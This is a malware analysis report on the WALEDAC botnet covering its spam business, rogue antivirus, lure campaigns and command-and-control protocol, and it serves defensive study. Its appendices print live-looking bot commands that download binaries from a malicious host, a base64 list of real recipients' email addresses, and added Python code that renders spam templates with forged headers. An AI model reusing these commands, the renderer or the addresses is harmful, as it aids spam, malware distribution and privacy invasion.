In the image below, the green-colored IP addresses represent proxy nodes while the blue-colored ones represent fast-flux networks. The red-colored IP addresses are used as both WALEDAC proxies and fast-flux networks. Based on our WALEDAC monitoring, around 7 percent of the total number of WALEDAC proxies are also used as parts of fast-flux networks.

Figure 23. WALEDAC proxies and fast-flux networks

Spam and Domain Information

The spam sent by WALEDAC and the domains of the links found therein exhibit characteristics associated with various spam groups, suggesting that it was primarily built as a spamming platform for rent.

From The Spamhaus Project’s top 10 known spammers, at least three groups appear to be renting out WALEDAC-spamming services, including:

» Canadian Pharmacy
» Leo Kuvayev/BadCow
» Yambo Financials

These groups are responsible for the majority of pharma spam (for Viagra, penis-enlargement, and other related subjects), original equipment manufacturer (OEM), pornographic, and fetishistic spam seen in mailboxes, all of which were seen during our WALEDAC monitoring.


Aside from the spam categories mentioned above, a mule spam targeting a specific language was also seen. This hints at WALEDAC-spamming services being made available not only to the top spam groups but also to smaller such groups with smaller target populations.

The domains used by WALEDAC to host its website were all registered at Ename Corp. Most of the spam domains advertised by WALEDAC were also registered at Ename. See Figure 14 in Appendix A for a sample of the whois output for a domain used in the bombing news campaign.

Domain Name: TERRORISMFREE.COM
Registrar: XIAMEN ENAME NETWORK TECHNOLOGY CORPORATION LIMITED DBA ENAME CORP
Whois Server: whois.ename.com
Referral URL: http://www.ename.com

Rogue Antivirus

Furthermore, using the malware download method in Command type 02, WALEDAC downloads a rogue antivirus malware claiming to be MS Antispyware 2009.

Figure 24. Rogue antivirus installed by WALEDAC called MS Antispyware 2009


The said rogue antivirus endlessly disrupts users with warnings about malware infections in their systems. It even interrupts users’ Web-browsing activities.

Figure 25. MS Antispyware 2009 alerts the user of spyware and other malware attacks

Figure 26. MS Antispyware 2009 blocking Web browsing


It even sports a fake Windows Security Center graphical user interface (GUI).

Figure 27. MS Antispyware 2009 fake Windows Security Center GUI

All of these annoyances aim to make the users click the link that leads to a page that sells the full version of MS Antispyware 2009 for US$49.95.

Figure 28. Full version of MS Antispyware 2009 sells for US$49.95


CONCLUSIONS

» WALEDAC’s primary business model is spamming but it is also used as a platform to introduce other malware to affected systems. WALEDAC is in business with at least three of the top 10 spammers identified by The Spamhaus Project. It is also involved with distributing rogue antivirus, which is currently one of the most prevalent security threats.

» The creators of WALEDAC are knowledgeable individuals, exhibiting a solid grasp of computing concepts such as P2P and distributed computing and the acumen to use technologies such as encryption and XML. These people are not run-of-the-mill programmers or hackers. Most concerning of all:

» They seem to be aware of and intend to capitalize on existing underground business opportunities.

» They are knowledgeable about antivirus, antispam, and Web-blocking technologies. In fact, each of WALEDAC’s most important components (e.g., binaries, spam, and domains) is programmed to be dynamic in nature in order to evade detection.

» WALEDAC is playing a numbers game, which serves as its strength. It maximizes its ability to update various aspects of its operation, thus posing a volume challenge in terms of the sheer number of affected systems and proxies, spam sent, and spam and malware domains it uses.

» WALEDAC embodies the collective knowledge of the cybercrime community of what works and what does not. It has also been said that “WALEDAC is the new Storm,” which is right in that WALEDAC copied and even improved aspects of Storm that made the latter successful. Its use of HTTP for C&C makes a lot of sense as well since HTTP is much more common than Overnet P2P, thus making it harder to identify and to block the C&C traffic that WALEDAC produces. This proves the cybercriminals’ ability to adapt to changes, making them even more dangerous.

» The people behind WALEDAC are doing their best to remain unknown. Their use of infected proxies and the act of registering domains to registrars linked to spam and malicious domains are meant to obscure their identities.


APPENDIX A

WALEDAC Social Engineering Tactics

At the time this report was written, WALEDAC was seen to have used eight social engineering attacks in an effort to make would-be victims run the malware. WALEDAC started out with the Christmas Ecard ploy.

Figure 1. Christmas ecard spam

Figure 2. Christmas ecard website


As the holiday season progressed into the New Year, so did WALEDAC’s campaign. The spam and their websites continued to use the ecard approach. This time, however, the ecards they sent contained New Year’s greetings.

Figure 3. Sample New Year ecard spam

Figure 4. WALEDAC’s New Year ecard website


With the U.S. presidential election flurry coming to a crescendo in January 2009, WALEDAC started sending out spam for its new campaign. The email campaign then carried the bad news that “Obama refused to be the next president.”

Figure 5. WALEDAC email carrying the news that Obama refuses to be the next U.S. president

Figure 6. WALEDAC rips text off from Obama’s website, bearing false news that he no longer wants to be the president

After taking advantage of Obama’s presidential campaign, WALEDAC then turned its sights to Valentine’s Day.


Figure 7. Spam promoting Valentine’s Day ecards

Figure 8. WALEDAC websites capitalizing on Valentine’s Day


The Valentine’s ecard website later changed with the addition of some text at the bottom of the image, which seemed to target software developers, to promote Valentine Devkit, which was, of course, a WALEDAC malware.

Figure 9. Valentine’s webpage promoting Valentine Devkit

The displayed images on the Valentine-themed websites later changed using a pool of several images with romantic themes. Several of these pictures are shown in Figure 10.

Figure 10. Pictures simultaneously displayed by Valentine-themed WALEDAC sites


Capitalizing on the current global financial crisis, WALEDAC changed its tactic once more to promote coupons.

Figure 11. WALEDAC spam campaign promoting coupons

Of course, users did not get coupons but malware.

Figure 12. WALEDAC’s coupons website


Some time later, the coupons website was updated with a GeoIP component, which enabled it to determine the user’s location. This geographic location feature was used to make localized versions of the coupon website, which made its social engineering ploy even more potent.

Figure 13. Using GeoIP, WALEDAC was able to create localized versions of the coupons website

(Note the inclusion of the user’s city name in the webpage.)

The geographic location feature of the localized websites was heavily used in WALEDAC’s next campaign—the terrorist bombing scare.

Figure 14. Spam carrying dire news of terrorist bombings


The websites were copycats of Reuters news pages, complete with supposed videos of the alleged bombing incidents.

Figure 15. WALEDAC terrorist-bombing website

The fake Reuters webpage used the classic “You need the latest Flash Player” dialog box. Clicking the link led users not to the Flash Player download page but to one from which they downloaded the WALEDAC malware.

WALEDAC then shifted gears to promote a tool for spying on somebody else’s short message service (SMS) messages, notably those of one’s partner or lover. The spam was designed to provoke people’s paranoia or fear that their partners might be cheating on them.


Figure 16. WALEDAC’s email campaign to provoke paranoia with regard to being cheated on by one’s partner

The URLs in the spam point to websites that advertise a free-trial download, supposedly capable of reading the SMS messages on somebody else’s mobile phone without anything being installed on that phone.

Unfortunately for those who installed the SMS Spy program, all they got was the WALEDAC bot.

Figure 17. WALEDAC’s SMS Spy website


APPENDIX B

Spamming Activity

Since we started monitoring WALEDAC, we have observed that it regularly sent out pharma spam.

Figure 1. Sample WALEDAC pharma spam

We noted five supposed pharmaceutical companies advertised by WALEDAC in spam, namely:

» Canadian Pharmacy (see Figure 2)
» Canadian Health and Care Mall (see Figure 3)
» ED Express (see Figure 4)
» Advanced Laboratories Inc. (see Figure 5)
» Pharmacy Express (see Figure 6)

Figure 2. Canadian Pharmacy website


Figure 3. Canadian Health and Care Mall website

Figure 4. ED Express website (ED stands for erectile dysfunction)

Figure 5. Advanced Laboratories Inc. website, which promotes a penis-enlargement patch

Figure 6. Pharmacy Express website


Besides pharma spam, WALEDAC also sends out spam enticing users with OEM software at discounted rates.

Figure 7. WALEDAC OEM spam

This OEM spam did not promote any website. Instead, it advertised the email addresses of people selling the so-called “OEM software.” Some of the email addresses we saw were:

» [email protected]
» [email protected]

WALEDAC sometimes also advertises an image-hosting site.

Figure 8. Image-hosting spam

An alternative view is that the image-hosting site may have been joe-jobbed, that is, advertised in spam without its owner’s involvement so that the site, rather than the spammer, takes the blame.5

5 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090401


WALEDAC also sent four distinct money-mule recruitment emails, all written in Italian.

Figure 9. Italian mule spam

These Italian mule-recruitment emails advertised the following email addresses:

» [email protected]
» [email protected]
» [email protected]
» [email protected]


WALEDAC also spammed links to online casino and gambling sites, many of them Geocities pages.

Figure 10. Geocities site advertised in WALEDAC’s online casino spam

The Geocities sites ultimately led to starplayvegas.com.

Figure 11. Final landing site of the casino spam run


WALEDAC also sent spam advertising two foot-fetish websites, namely:

» ticklefootsies.com
» barefootsies.com

Figure 12. Foot-fetish sites advertised by WALEDAC via spam


APPENDIX C

WALEDAC HTTP2P Communication Protocol

There are nine known WALEDAC commands, which we label by type, namely, ff, 01, 02, 03, 04, 05, 06, 07, and None; each is used for a specific purpose (no sample of type 06 is reproduced below). On the wire the command name travels in the <t> element of an <lm> document, and every bot-originated POST shares the same envelope: <t> (the command), <v> (a version number; 33 or 34 in these samples), <i> (a 32-hex-digit identifier that stays constant across one bot’s messages and has the same format as the node IDs exchanged in the peer list), and <r> (0 in every sample). Replies echo <v> and <t> and carry their payload in <props> and command-specific elements.

Command Type: FF (GETKEY)

SAMPLE POST

<lm>
  <t>getkey</t>
  <v>34</v>
  <i>1302b4463f55063a6c293a55412a820e</i>
  <r>0</r>
  <props>
    <p n="cert">
-----BEGIN CERTIFICATE-----
…
-----END CERTIFICATE-----
    </p>
  </props>
</lm>

SAMPLE REPLY

<lm>
  <v>34</v>
  <t>getkey</t>
  <props>
    <p n="key">
      NqWX5VZ/w/Lr7wAkGwtITkYuwb4PuuUoEAS/7RqFOx0mUiwmSBH3sjH3p01KiRcAFG08LE5i8mu48DYGsgLDtvIVu8GLZesFWHjVwcyWqUNPXHvqDXpJu5cb63xtKUlSPQH4YMqGVXvdIfYU7JHKys5r3p37sRCStWvOx0HSgRw=
    </p>
  </props>
</lm>

The POST carries the bot’s own X.509 certificate in PEM form. The key value in the reply is 172 base64 characters, that is, a 128-byte value, which is the size of a 1024-bit RSA ciphertext and so consistent with a session key encrypted to the public key in the certificate the bot has just presented.


Command Type: 01 (FIRST)

This appears to be the registration of a new bot: it reports a build label (mirabella) and the Windows version (5.1.2600 is Windows XP). The reply carries no properties.

SAMPLE POST

<lm>
  <t>first</t>
  <v>34</v>
  <i>1302b4463f55063a6c293a55412a820e</i>
  <r>0</r>
  <props>
    <p n="label">mirabella</p>
    <p n="winver">5.1.2600</p>
  </props>
</lm>

SAMPLE REPLY

<lm>
  <v>34</v>
  <t>first</t>
  <props>
  </props>
</lm>

Command Type: 02 (NOTIFY)

The bot checks in with its label and four clocks: when it started (time_init), the current and system time (time_now, time_sys), and time_ticks (199423859, consistent with a millisecond uptime counter of roughly 55 hours, longer than the seven hours between time_init and time_now).

SAMPLE POST

<lm>
  <t>notify</t>
  <v>34</v>
  <i>1302b4463f55063a6c293a55412a820e</i>
  <r>0</r>
  <props>
    <p n="label">mirabella_site</p>
    <p n="time_init">Wed Apr 15 10:52:39 2009</p>
    <p n="time_now">Wed Apr 15 17:47:38 2009</p>
    <p n="time_sys">Wed Apr 15 17:47:39 2009</p>
    <p n="time_ticks">199423859</p>
  </props>
</lm>


SAMPLE REPLY

<lm>
  <v>34</v>
  <t>notify</t>
  <props>
    <p n="ptr">wergvan</p>
    <p n="ip">203.177.193.xxx</p>
    <p n="dns_ip">203.144.255.71</p>
    <p n="smtp_ip">209.85.135.27</p>
    <p n="http_cache_timeout">3600</p>
    <p n="sender_threads">13</p>
    <p n="sender_queue">2000</p>
    <p n="short_logs">true</p>
    <p n="commands">
      <![CDATA[
      337|update|http://usabreakingnews.com/mir.jpg
      340|download|http://usabreakingnews.com/win.jpg
      ]]>
    </p>
  </props>
  <dns_zones></dns_zones>
  <dns_hosts></dns_hosts>
  <socks5></socks5>
  <dos></dos>
  <filter></filter>
</lm>

The reply is the bot’s configuration: its public address as seen by the proxy and a reverse name (ip, ptr), the DNS and SMTP servers to use, spam-sender tuning (sender_threads, sender_queue, http_cache_timeout) and a list of id|action|URL commands, here an update and a download of binaries served under .jpg names from usabreakingnews.com. Judging by their names, the empty dns_zones, dns_hosts, socks5, dos and filter elements are slots for other roles (fast-flux DNS records, SOCKS5 proxying, denial of service) that this particular reply did not assign.
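The notify reply is the bot’s configuration download. The following Python is an added example, not code from the paper or from WALEDAC: it parses such a reply into typed properties and a list of id|action|URL commands. The sample message is constructed after the reply above; the usabreakingnews.com host is the one the paper shows, while the IP addresses are taken from the 192.0.2.0/24 documentation range.

```python
"""Parse a WALEDAC notify reply: bot configuration plus the command list.

Added example; not code from the paper or from the malware. The sample
message is constructed after the reply shown in the appendix (same host
name, documentation-range IP addresses).
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample. The page's copy of the real reply ran the two command
# records together ("...mir.jpg340|download|..."); the records are kept fused
# here on purpose so the parser has to cope with that as well as with newlines.
SAMPLE_NOTIFY_REPLY = """<lm>
  <v>34</v>
  <t>notify</t>
  <props>
    <p n="ptr">wergvan</p>
    <p n="ip">192.0.2.10</p>
    <p n="dns_ip">192.0.2.53</p>
    <p n="smtp_ip">192.0.2.25</p>
    <p n="http_cache_timeout">3600</p>
    <p n="sender_threads">13</p>
    <p n="sender_queue">2000</p>
    <p n="short_logs">true</p>
    <p n="commands"><![CDATA[337|update|http://usabreakingnews.com/mir.jpg340|download|http://usabreakingnews.com/win.jpg]]></p>
  </props>
  <dns_zones></dns_zones>
  <dns_hosts></dns_hosts>
  <socks5></socks5>
  <dos></dos>
  <filter></filter>
</lm>"""

# A record is "<id>|<action>|<url>". The URL is matched lazily and ends at
# whitespace, at the end of the text, or where the next "<id>|<action>|" begins.
COMMAND_RE = re.compile(r"(\d+)\|([a-z]+)\|(\S+?)(?=\s|\d+\|[a-z]+\||$)")

INT_PROPS = ("http_cache_timeout", "sender_threads", "sender_queue")
BOOL_PROPS = ("short_logs",)


def parse_notify_reply(xml_text):
    """Return the typed props, the parsed command list and the optional sections."""
    root = ET.fromstring(xml_text)
    if root.tag != "lm" or root.findtext("t") != "notify":
        raise ValueError("not a notify reply")
    props = {p.get("n"): (p.text or "").strip() for p in root.find("props").iter("p")}
    for name in INT_PROPS:
        if name in props:
            props[name] = int(props[name])
    for name in BOOL_PROPS:
        if name in props:
            props[name] = props[name].lower() == "true"
    commands = [
        {"id": int(cid), "action": action, "url": url}
        for cid, action, url in COMMAND_RE.findall(props.pop("commands", ""))
    ]
    # Everything other than v/t/props (dns_zones, dns_hosts, socks5, dos, filter)
    # is an optional section; all are empty in the sample, so only record presence.
    sections = {child.tag: (child.text or "").strip()
                for child in root if child.tag not in ("v", "t", "props")}
    return {"version": int(root.findtext("v")), "props": props,
            "commands": commands, "sections": sections}


def command_hosts(parsed):
    """Hosts the bot would contact for updates and downloads, e.g. for blocklisting."""
    return sorted({re.sub(r"^https?://([^/]+).*$", r"\1", c["url"]) for c in parsed["commands"]})


if __name__ == "__main__":
    result = parse_notify_reply(SAMPLE_NOTIFY_REPLY)
    for c in result["commands"]:
        print(c["id"], c["action"], c["url"])
    print("hosts:", command_hosts(result))
```

The command regex is the part worth a second look: because URLs and record ids are not separated by a fixed delimiter once the line breaks are lost, the URL match has to stop at the point where the next record’s “id|action|” would start.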

Command Type: 03 (TASKREQ)

SAMPLE POST

<lm>
  <t>taskreq</t>
  <v>34</v>
  <i>1302b4463f55063a6c293a55412a820e</i>
  <r>0</r>
  <props></props>
</lm>

SAMPLE REPLY

<lm>
  <v>27</v>
  <t>taskreq</t>
  <props></props>
  <tasks>
    <task id="4">
      <body>…</body>
      <a>[email protected]</a>
      <a>[email protected]</a>
      <a>[email protected]</a>
      <a>[email protected]</a>
      …
      <w>charset</w>
      <w>cupo_file</w>
      <w>cupo_link</w>
      <w>cupo_string</w>
      <w>domains</w>
      <w>mynames</w>
      <w>names</w>
      <w>outver</w>
      <w>outver.5</w>
      <w>outver.6</w>
      <w>pharma</w>
      <w>pharma_links</w>
      <w>sendmailver</w>
      <w>surnames</w>
      <w>svcver</w>
      <w>trunver</w>
    </task>
    <task id="3">
      <body>JV5IMyVeRnZhbGVfY29tcGFueV4lXiUlXkg0JV5GbXluYW1lc14lXiVSZWNlaXZlZDogZnJvbSAlXkMwJV5QJV5SMy02XiU6cXdlcnR5dWlvcGFzZGZnaGprbHp4Y3Zibm1eJV4lIChbJV5DNiVeSV4lLiVeSV4lLiVeSV4lLiVeSV4lXiVdKSBieSAlXkFeJSB3aXRoIE1pY3Jvc29mdCBTTVRQU1ZDKCVeRnN2Y3Zlcl4lKTsgJV5EXiUKTWVzc2FnZS1JRDogPCVeTyVeVjZeJTolXlIzLTUwXiVeJSVeVjBeJT4KRnJvbTogIiVeVjReJSIgPCVeRm5hbWVzXiVAJV5GZG9tYWluc14lPgpUbzogPCVeMF4lPgpTdWJqZWN0OiAlXkZjdXBvX3N0cmluZ14lCkRhdGU6ICVeRC0lXlIzMC02MDBeJV4lCk1JTUUtVmVyc2lvbjogMS4wCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsKCWZvcm1hdD1mbG93ZWQ7CgljaGFyc2V0PSIlXkZjaGFyc2V0XiUiOwoJcmVwbHktdHlwZT1vcmlnaW5hbApDb250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiA3Yml0ClgtUHJpb3JpdHk6IDMKWC1NU01haWwtUHJpb3JpdHk6IE5vcm1hbApYLU1haWxlcjogTWljcm9zb2Z0IE91dGxvb2sgRXhwcmVzcyA2LjAwLiVeQzclXkZvdXR2ZXIuNl4lXiUKWC1NaW1lT0xFOiBQcm9kdWNlZCBCeSBNaWNyb3NvZnQgTWltZU9MRSBWNi4wMC4lXlY3XiUKCiVeSiVeRmN1cG9fc3RyaW5nXiUgaHR0cDovLyVeUCVeUjItNl4lOnF3ZXJ0eXVpb3Bhc2RmZ2hqa2x6eGN2Ym5tZXl1aW9hXiUuJV5GY3Vwb19saW5rXiUvJV5GY3Vwb19maWxlXiUucGhwXiUK</body>
      <a>[email protected]</a>
      <a>[email protected]</a>
      <a>[email protected]</a>
      <a>[email protected]</a>
      …
      <w>charset</w>
      <w>cupo_file</w>
      <w>cupo_link</w>
      <w>cupo_string</w>
      <w>domains</w>
      <w>mynames</w>
      <w>names</w>
      <w>outver</w>
      <w>outver.5</w>
      <w>outver.6</w>
      <w>pharma</w>
      <w>pharma_links</w>
      <w>sendmailver</w>
      <w>surnames</w>
      <w>svcver</w>
      <w>trunver</w>
    </task>
  </tasks>
  <words>
    <w name="trunver" time="1234183272"/>
    <w name="pharma" time="1236690754"/>
    <w name="svcver" time="1233919248"/>
    <w name="outver" time="1233919245"/>
    <w name="domains" time="1236988929"/>
    <w name="names" time="1236989403"/>
    <w name="charset" time="1233919243"/>
    <w name="pharma_links" time="1236989413"/>
    <w name="mynames" time="1233919245"/>
    <w name="outver.6" time="1233919246"/>
    <w name="cupo_string" time="1235331549"/>
    <w name="surnames" time="1233919247"/>
    <w name="outver.5" time="1233919246"/>
    <w name="cupo_file" time="1235336882"/>
    <w name="sendmailver" time="1233919247"/>
    <w name="cupo_link" time="1235404378"/>
  </words>
</lm>

Each task consists of a base64-encoded <body>, the recipient addresses (<a>) and the word lists (<w>) needed to render it. Decoded, the body of task 3 is a message template with placeholders of the form %^X…^%:

%^H3%^Fvale_company^%^%%^H4%^Fmynames^%^%Received: from %^C0%^P%^R3-6^%:qwertyuiopasdfghjklzxcvbnm^%^% ([%^C6%^I^%.%^I^%.%^I^%.%^I^%^%]) by %^A^% with Microsoft SMTPSVC(%^Fsvcver^%); %^D^%
Message-ID: <%^O%^V6^%:%^R3-50^%^%%^V0^%>
From: "%^V4^%" <%^Fnames^%@%^Fdomains^%>
To: <%^0^%>
Subject: %^Fcupo_string^%
Date: %^D-%^R30-600^%^%
MIME-Version: 1.0
Content-Type: text/plain;
    format=flowed;
    charset="%^Fcharset^%";
    reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.%^C7%^Foutver.6^%^%
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.%^V7^%

%^J%^Fcupo_string^% http://%^P%^R2-6^%:qwertyuiopasdfghjklzxcvbnmeyuioa^%.%^Fcupo_link^%/%^Fcupo_file^%.php^%

The %^F<name>^% placeholders name word lists: the sender address is assembled from names and domains, the subject and body text from cupo_string, the link from cupo_link and cupo_file, the forged Received header from svcver, the charset from charset and the Outlook Express version from outver.6. Every list the template references, except vale_company, appears in the task’s <w> elements. The trailing <words> element lists every word list with a Unix timestamp (1233919243 to 1236989413, that is, 6 February to 14 March 2009), presumably the time each list last changed, so that a bot need only re-fetch lists that are newer than its copy.
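A task is a base64-encoded message template plus the recipients and word lists it needs. The following Python is an added example, not code from the paper or from WALEDAC: it parses a constructed taskreq reply, checks that every word list the template references through %^F<list>^% is declared in <w>, and expands the template for one recipient. The macro semantics it implements (R as a random integer range, P as a random string of a given length and alphabet, I as an IP octet, C and H as captures that V repeats, a bare 0 as the recipient) are inferred from the decoded body of task 3 and are assumptions; unknown macros such as %^J…^% are passed through. The sample task, recipients and word lists are constructed and far shorter than the real ones.

```python
"""Parse a WALEDAC taskreq reply and expand its spam template.

Added example, not code from the paper or from WALEDAC. The macro semantics
below are inferred from the decoded <body> of task 3 and are assumptions.
"""
import base64
import random
import re
import xml.etree.ElementTree as ET

# Constructed template in the page's macro syntax (a cut-down version of task 3).
TEMPLATE = (
    "%^H4%^Fmynames^%^%"
    "Received: from %^C0%^P%^R3-6^%:qwertyuiopasdfghjklzxcvbnm^%^% "
    "([%^C6%^I^%.%^I^%.%^I^%.%^I^%^%]) with Microsoft SMTPSVC(%^Fsvcver^%)\n"
    'From: "%^V4^%" <%^Fnames^%@%^Fdomains^%>\nTo: <%^0^%>\n'
    "Subject: %^Fcupo_string^%\n"
    "X-Mailer: Microsoft Outlook Express 6.00.%^C7%^Foutver.6^%^%\n"
    "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.%^V7^%\n\n"
    "%^J%^Fcupo_string^% http://%^P%^R2-6^%:qwertyuiopasdfghjklzxcvbnm^%."
    "%^Fcupo_link^%/%^Fcupo_file^%.php^%\n"
)
# Constructed word lists; the entries are taken from the words replies in this appendix.
WORD_LISTS = {
    "mynames": ["Abel", "Ada"], "names": ["admin", "abc"],
    "domains": ["example.com", "example.net"],
    "cupo_string": ["Hot deals in your city", "You'll thank me for this!"],
    "cupo_link": ["thecoupondiscount.com", "greatcouponclub.com"],
    "cupo_file": ["coupons", "nocrisis"],
    "svcver": ["6.0.3790.0", "5.0.2195.6713"], "outver.6": ["2900.2180", "2800.1106"],
}
# Constructed taskreq reply carrying the template the way the bot receives it.
SAMPLE_TASKREQ_REPLY = f"""<lm><v>27</v><t>taskreq</t><props></props><tasks>
<task id="3"><body>{base64.b64encode(TEMPLATE.encode()).decode()}</body>
<a>alice@example.org</a><a>bob@example.org</a>
<w>cupo_file</w><w>cupo_link</w><w>cupo_string</w><w>domains</w><w>mynames</w>
<w>names</w><w>outver.6</w><w>svcver</w><w>charset</w></task></tasks></lm>"""

OPEN, CLOSE = "%^", "^%"
LIST_REF = re.compile(r"%\^F([\w.]+)\^%")
HEAD = re.compile(r"[CHV]\d+|[A-Z]|\d+")  # C/H/V carry a slot number; a bare digit is the recipient


def parse_tasks(xml_text):
    """Each task: id, base64-decoded template, recipients (<a>) and declared word lists (<w>)."""
    return [{
        "id": int(t.get("id")),
        "template": base64.b64decode(t.findtext("body")).decode("latin-1"),
        "recipients": [a.text for a in t.findall("a")],
        "lists": {w.text for w in t.findall("w")},
    } for t in ET.fromstring(xml_text).iter("task")]


def referenced_lists(template):
    """Word lists the template actually draws from through %^F<list>^%."""
    return set(LIST_REF.findall(template))


class Expander:
    def __init__(self, lists, rcpt, rng):
        self.lists, self.rcpt, self.rng, self.env = lists, rcpt, rng, {}

    def expand(self, text, i=0, nested=False):
        """Expand from index i; when nested, stop at the enclosing ^% and return (value, index)."""
        out = []
        while i < len(text):
            if nested and text.startswith(CLOSE, i):
                return "".join(out), i + len(CLOSE)
            if text.startswith(OPEN, i):
                head = HEAD.match(text, i + len(OPEN))
                if head is None:
                    raise ValueError(f"bad macro at offset {i}")
                content, i = self.expand(text, head.end(), True)  # content may nest macros
                out.append(self.apply(head.group(0), content))
            else:
                out.append(text[i])
                i += 1
        if nested:
            raise ValueError("unterminated macro")
        return "".join(out)

    def apply(self, head, content):
        kind, slot, rng = head[0], head[1:], self.rng
        if kind == "F":                    # draw from a word list
            return rng.choice(self.lists[content])
        if kind == "R":                    # random integer lo-hi
            lo, hi = (int(x) for x in content.split("-"))
            return str(rng.randint(lo, hi))
        if kind == "P":                    # random string: "<length>:<alphabet>"
            n, alphabet = content.split(":", 1)
            return "".join(rng.choice(alphabet) for _ in range(int(n)))
        if kind == "I":                    # IP octet
            return str(rng.randint(1, 254))
        if kind in "CH":                   # capture into a slot; C also emits the value
            self.env[slot] = content
            return content if kind == "C" else ""
        if kind == "V":                    # repeat a captured value
            return self.env.get(slot, "")
        if kind.isdigit():                 # %^0^%: the recipient address
            return self.rcpt
        return content                     # unknown wrapper: pass its content through


def render(task, lists, rcpt, seed=0):
    """Expand a task's template for one recipient; the seed makes the output reproducible."""
    missing = referenced_lists(task["template"]) - set(lists)
    if missing:
        raise KeyError(f"word lists not fetched yet: {sorted(missing)}")
    return Expander(lists, rcpt, random.Random(seed)).expand(task["template"])
```

Calling render(parse_tasks(SAMPLE_TASKREQ_REPLY)[0], WORD_LISTS, "alice@example.org") produces one complete message; the X-Mailer and X-MimeOLE versions come out identical because the C7 capture is replayed by V7, which is exactly the detail a mail filter can test for. The referenced_lists check is the same consistency check the bot implicitly relies on: a task whose template names a list not declared in <w> (the real task 3 references vale_company) cannot be rendered until that list is fetched.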


Command Type: 04 (WORDS)

SAMPLE POST (cupo_string)

<lm>
  <t>words</t>
  <v>33</v>
  <i>1302b4463f55063a6c293a55412a820e</i>
  <r>0</r>
  <props>
    <p n="word_name">cupo_string</p>
  </props>
</lm>

The cupo_link and cupo_file lists (and every other list named in a task’s <w> elements) are requested with the same POST, differing only in the word_name value.


SAMPLE CUPO_STRING REPLY

<lm>
  <v>33</v>
  <t>words</t>
  <props></props>
  <word name="cupo_string">
    <![CDATA[20-95 % off! Best shops! A good way to cut down on costs A good way to save money is to use these coupons A special discount voucher listing … … … Hot deals in your city Hottest coupons for you I discovered a great deal I found a fantastic bargain I found great sales I guess you’ll need it … … … You’ll be glad to see this You’ll thank me You’ll thank me for this!]]>
  </word>
</lm>

SAMPLE CUPO_LINK REPLY

<lm>
  <v>33</v>
  <t>words</t>
  <props></props>
  <word name="cupo_link">
    <![CDATA[thecoupondiscount.com greatcouponclub.com codecouponsite.com yourcountycoupon.com bestcouponfree.com smartsalesgroup.com greatsalestax.com supersalesonline.com greatsalesgroup.com greatsalesavailable.com]]>
  </word>
</lm>


SAMPLE CUPO_FILE REPLY

<lm>
  <v>33</v>
  <t>words</t>
  <props></props>
  <word name="cupo_file">
    <![CDATA[coupons coupon list discounts saleslist salelist sale couponlist couponslist disc sales print save run stopcrisis nocrisis]]>
  </word>
</lm>

SAMPLE MYNAMES REPLY

<lm>
  <v>33</v>
  <t>words</t>
  <props></props>
  <word name="mynames">
    <![CDATA[Abel Abraham Ada Adalbert Adam Adrian Agatha … … … Win Winifred Winnie]]>
  </word>
</lm>


SAMPLE NAMES REPLY

<lm>
  <v>33</v>
  <t>words</t>
  <props></props>
  <word name="names">
    <![CDATA[a.slinko abc action1 actionsurveys activation_test admin … … … zadm-dm]]>
  </word>
</lm>

SAMPLE DOMAINS REPLY

<lm>
  <v>33</v>
  <t>words</t>
  <props></props>
  <word name="domains">
    <![CDATA[6c.com 9orange.com aapt.com.au abbaye67.be acronet.co.jp ad.hm.edu admin.ufl.edu … … … xs4all.nl yahoo.com]]>
  </word>
</lm>


SAMPLE CHARSET REPLY

<lm>
  <v>33</v>
  <t>words</t>
  <props></props>
  <word name="charset">
    <![CDATA[windows-1252 windows-1250 iso-8859-1 iso-8859-2]]>
  </word>
</lm>

SAMPLE OUTVER REPLY

<lm>
  <v>33</v>
  <t>words</t>
  <props></props>
  <word name="outver">
    <![CDATA[2800.1106 2800.1106 2800.1106 2800.1106 2900.2180 2900.2180 2900.2180 2800.1158 2800.1437 2800.1409 2800.1506 2800.1807]]>
  </word>
</lm>

SAMPLE TRUNVER REPLY

<lm>
  <v>33</v>
  <t>words</t>
  <props></props>
  <word name="trunver">
    <![CDATA[2.0.0.9 (Windows/20071031) 1.5.0.14 (Windows/20071210)]]>
  </word>
</lm>


SAMPLE SENDMAILVER REPLY

<lm>
  <v>33</v>
  <t>words</t>
  <props></props>
  <word name="sendmailver">
    <![CDATA[(8.13.1/8.13.1) (8.13.2/8.13.2) (8.13.3/8.13.3) (8.13.4/8.13.4) (8.13.5/8.13.5) (8.13.6/8.13.6)]]>
  </word>
</lm>

SAMPLE SVCVER REPLY

<lm>
  <v>33</v>
  <t>words</t>
  <props></props>
  <word name="svcver">
    <![CDATA[6.0.3790.0 5.0.2195.6713 6.0.3790.211 5.0.2195.6713 6.0.3790.0 6.0.3790.1830 5.0.2195.5329 6.0.3790.0 5.0.2195.6713 5.0.2195.4905]]>
  </word>
</lm>

Command Type: 05 (TASKREQ)

This command reports to the WALEDAC proxies the outcome of each spam delivery attempted for a task. Each rep entry carries the task id (4 here, matching the task handed out in the taskreq reply), the recipient address and a result of OK or ERR. When the b64 prop is true, the recipient and the result are base64-encoded (RVJS is ERR, T0s= is OK); the sample below also shows some entries in the clear. Note that the sample’s <t> element reads taskreq, the same string as command 03; the two are told apart by the presence of the <reports> element.


SAMPLE POST

<lm>
  <t>taskreq</t>
  <v>34</v>
  <i>1302b4463f55063a6c293a55412a820e</i>
  <r>0</r>
  <props>
    <p n="b64">true</p>
  </props>
  <reports>
    <rep id="4" rcpt="YnJlbmRhLmxhcnNlbkBjYW5hZGFwb3N0LmNh">RVJS</rep>
    <rep id="4" rcpt="bWFnaWNhbGtpcmFAeWFob28uY28uanA=">RVJS</rep>
    <rep id="4" rcpt="c3VlZEBtY3BpbnMuY29t">RVJS</rep>
    <rep id="4" rcpt="YnJ1Y2UuZS5yaWVkZUB1bmlsZXZlci5jb20=">T0s=</rep>
    <rep id="4" rcpt="ZC5wcnp5Ynl0bmlha0ByemVjenBvc3BvbGl0YS5wbA==">T0s=</rep>
    …
    <rep id="4" rcpt="bmljaG9sYXMuYWxlc2V2aWNoQHBvbHljb20uY29t">RVJS</rep>
    <rep id="4" rcpt="dmVua2F0LmphbGFnYW1AZ21haWwuY29t">RVJS</rep>
